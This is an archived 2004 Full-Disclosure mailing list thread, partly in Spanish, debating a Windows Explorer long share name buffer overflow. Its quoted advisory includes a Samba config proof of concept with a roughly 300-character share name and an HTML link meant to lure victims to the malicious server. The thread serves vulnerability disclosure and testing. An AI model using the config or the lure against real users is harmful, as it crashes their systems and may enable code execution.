lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20040426230008.29566.qmail@web12702.mail.yahoo.com>
Date: Mon, 26 Apr 2004 18:00:08 -0500 (CDT)
From: Daniel Regalado Arias <dan57170@...oo.com>
To: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>,
   full-disclosure@...ts.netsys.com, info@...uriteam.com,
   bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org
Subject: Re: RE: Microsoft's Explorer and Internet Explorer long share name buffer overflow.


Pues mira Gutierrez, yo tengo un servidor samba
funcionando correctamente en mi red, y efectivamente
puse un share existente y no el que propones,
obviamente con un usuario valido y de hecho en el
explorer me aparece el nombre con las 300' caracteres
A,
no me deja entrar pero tampoco truena.

Thats it!!!!!

 --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
escribió: > Then you probably didnt doit right, me and
others
> such as the secunia people
> (www.secunia.com) have tested this
> Vulnerability and proved that the systems are
> vulnerable. Even microsoft
> says that the vulnerability was not patched
> Until w2k sp4.
> 
> I tested this vulnerability in the following full
> patched systems:
> 
> Windows 98            (Vulnerable)
> Windows Me            (Vulnerable)
> Windows NT (All)      (Vulnerable)
> Windows 2k (All)      (Vulnerable)
> Windows XP (All)      (Vulnerable)
> Windows 2003 server   (Not Vulnerable)
> 
> Remember that if you want to test the vulnerability,
> first you must know how
> samba works.   Its not just to paste the example
> Config in a smb.conf file, you must create the
> directory that is pointed in
> the share and perhaps have a valid user.
> 
> Regards
> 
> 
> Rodrigo.-
> 
> 
> -----Mensaje original-----
> De: Daniel Regalado Arias
> [mailto:dan57170@...oo.com] 
> Enviado el: Lunes, 26 de Abril de 2004 16:56
> Para: Rodrigo Gutierrez;
> full-disclosure@...ts.netsys.com;
> bugtraq@...urityfocus.com;
> submissions@...ketstormsecurity.org;
> info@...uriteam.com
> Asunto: Re: Microsoft's Explorer and Internet
> Explorer long share name
> buffer overflow.
> 
> Well, i have tested it in W2k with sp3 and explorer
> didnt get crashed!!!!!!!
> 
> Well, i cant get into the share because a message
> appears saying "share name
> not found"!!!!
> 
> But, explorer is OK.
> 
> 
>  --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> escribió: > Sunday afternoon is a bit boring, and
> weather sucks
> > down here in Santiago,
> > Chile so here we go...
> > The vuln is attached in TXT format, I would be
> gratefull if someone 
> > could verify if it affects windows 2003 as well.
> > 
> > Rodrigo.-
> > > Microsoft Explorer and Internet Explorer Long
> Share
> > Name Buffer Overflow.
> > 
> > 
> > 
> > Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
> > 
> > Affected: MS Internet Explorer, MS Explorer
> > (explorer.exe) 
> >           Windows XP(All), Windows 2000(All)
> > 
> > Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
> > 
> > Vendor Status: i notified the vendor in the
> beginning of 2002, this
> >                vulnerability was supposed to be
> fixed in xp service
> >                pack 1 according to the vendors
> knowledge base article
> >                322857.
> > 
> > Vendor url:
> >
>
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> > 
> > 
> > 
> > Background.
> > 
> > MS Explorer (explorer.exe) and MS Internet
> > Explorer(IEXPLORE.EXE) are
> > core pieces of Microsoft Windows Operating
> Systems.
> > 
> > 
> > 
> > Description
> > 
> > Windows fails to handle long share names when
> accessing a remote file 
> > servers such as samba, allowing a malicious server
> to crash the 
> > clients explorer and eventually get to execute
> arbitrary code in the 
> > machine as the current user (usually with
> Administrator rights in 
> > windows machines).
> > 
> > 
> > 
> > Analysis
> > 
> > In order to exploit this, an attacker must be able
> to get a user to 
> > connect to a malicious server which contains a
> share name equal or 
> > longer than 300 characters, windows wont allow you
> to create such a 
> > share, but of course samba
> > includes the feature ;).   After your samba box is
> > up and running create a
> > share in you smb.conf :
> > 
> > 
> > 
> > #------------ CUT HERE -------------
> > 
> >
>
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> > comment = Area 51
> > path = /tmp/testfolder
> > public = yes
> > writable = yes
> > printable = no
> > browseable = yes
> > write list = @trymywingchung
> > 
> > #------------ CUT HERE -------------
> > 
> > 
> > After your server is up, just get to your windows
> test box and get to 
> > the start menu > run >
> \\your.malicious.server.ip., plufff, explorer 
> > will crash :).
> > 
> > Social Engineering:
> > 
> > <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
> >  
> > 
> > 
> > Workaround.
> > 
> > From your network card settings disable the client
> for Microsoft 
> > networks until a real fix for this vulnerability
> is available.
> >  
> 
>
_________________________________________________________
> Do You Yahoo!?
> Información de Estados Unidos y América Latina, en
> Yahoo! Noticias.
> Visítanos en http://noticias.espanol.yahoo.com
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.netsys.com/full-disclosure-charter.html 

_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ